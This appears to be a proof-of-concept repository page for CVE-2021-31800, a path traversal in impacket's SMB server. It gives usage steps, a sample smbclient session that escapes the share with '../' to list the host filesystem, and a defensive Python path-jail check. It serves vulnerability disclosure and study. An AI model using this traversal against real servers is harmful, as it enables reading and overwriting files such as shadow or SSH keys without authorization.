
CVE-2021-31800 PoC — impacket path traversal vulnerability

Source
Associated Vulnerability
Title: impacket path traversal vulnerability (CVE-2021-31800)
Description: impacket is an application: a collection of Python classes for working with network protocols. Versions of Impacket before 0.9.22 contain a security vulnerability caused by multiple path traversal flaws in smbserver.py. An attacker can exploit it to list and write arbitrary files by using `..` (directory traversal), and can achieve arbitrary code execution by replacing etc shadow or the SSH authorized keys.
Description
A path traversal in smbserver.py allows an attacker to read/write arbitrary files on the server.
Readme
# CVE-2021-31800 - Impacket SMB Server Arbitrary file read/write

 - **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`
 - **CVSS Score**: 9.9 (Critical)

## Description

A path traversal in [smbserver.py](https://github.com/fortra/impacket/blob/cb6d43a677c338db930bc4e9161620832c1ec624/impacket/smbserver.py) allows an attacker to read/write arbitrary files on the server. 

Detailed explanation of this issue: [https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/](https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/)

## Usage

Start the exploit environment by typing `make` inside [./exploit_env/](./exploit_env/). You can then use a modified version of smbclient.py to read and write arbitrary files through the path traversal.

You can then use `../` to move around the file system and read or write files! Here is an example:

```
# smbclient.py 192.168.1.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# shares
IPC$
SYSVOL
# use SYSVOL
# ls 
-rw-rw-rw-         10  Sun Jan  8 23:59:59 2023 test.txt
# ls ../
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 sbin
drw-rw-rw-        360  Sun Jan  8 23:59:59 2023 dev
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 sys
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 media
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 srv
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 opt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 tmp
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 var
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 bin
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 root
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 usr
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 mnt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 run
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 boot
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 etc
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 proc
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib64
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 home
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 share
-rw-rw-rw-          0  Sun Jan  8 23:59:59 2023 .dockerenv
-rw-rw-rw-        142  Sun Jan  8 23:59:59 2023 entrypoint.sh
#
```
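As an added illustration (not code from this repository or from impacket), the following Python contrasts the naive share-root join that a traversal like the `../` listing above abuses with a jail check that refuses any normalized path outside the share. The share name, its root directory and the request paths are constructed for the example.

```python
import posixpath

# Constructed share table (assumption): SMB share SYSVOL is exported from /srv/sysvol
# on a Unix host. Not impacket's own code; an added illustration of the check a
# file-serving SMB handler must perform before touching the file system.
SHARES = {"SYSVOL": "/srv/sysvol"}


def translate_smb_path(share, smb_path):
    """Turn a client-supplied SMB path (backslash separated) into a host path.
    This is the vulnerable pattern: join onto the share root and normalize,
    but never verify that the result is still inside the share."""
    rel = smb_path.replace("\\", "/").lstrip("/")
    return posixpath.normpath(posixpath.join(SHARES[share], rel))


def is_in_file_jail(share_root, candidate):
    """True only if `candidate` lies inside `share_root` after normalization.
    Uses commonpath rather than a string prefix test, so a sibling directory
    such as /srv/sysvol2 is not mistaken for a child of /srv/sysvol."""
    root = posixpath.normpath(share_root)
    full = posixpath.normpath(candidate)
    return posixpath.commonpath([root, full]) == root


def resolve_checked(share, smb_path):
    """Hardened pattern: same translation, then reject anything that escaped.
    Returns the host path, or None when the request must be refused."""
    candidate = translate_smb_path(share, smb_path)
    if not is_in_file_jail(SHARES[share], candidate):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: an in-share file, a dot-dot escape, and a sibling dir.
    for req in ("test.txt", "..\\..\\etc\\shadow", "..\\sysvol2\\x"):
        print(f"{req!r:22} naive={translate_smb_path('SYSVOL', req)!r:22} "
              f"checked={resolve_checked('SYSVOL', req)!r}")
```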

## Demonstration

For demonstrations, you can start the vulnerable environment by typing `make` inside [./vulnerable_env/](./vulnerable_env/).

## References
 - https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
 - Interesting comment: https://github.com/fortra/impacket/blob/fea485d2e4a53e9c26c02678237df1fc6621b5f4/impacket/smbserver.py#L16
File Snapshot

[4.0K] /data/pocs/d50fb61599e9683065824dfac84cf64015300862
├── [4.0K] exploit_env
│   ├── [ 669] Dockerfile
│   ├── [ 426] Makefile
│   └── [4.0K] patched
│       └── [ 17K] smbclient.py
├── [2.7K] README.md
└── [4.0K] vulnerable_env
    ├── [ 830] Dockerfile
    └── [ 456] Makefile

3 directories, 6 files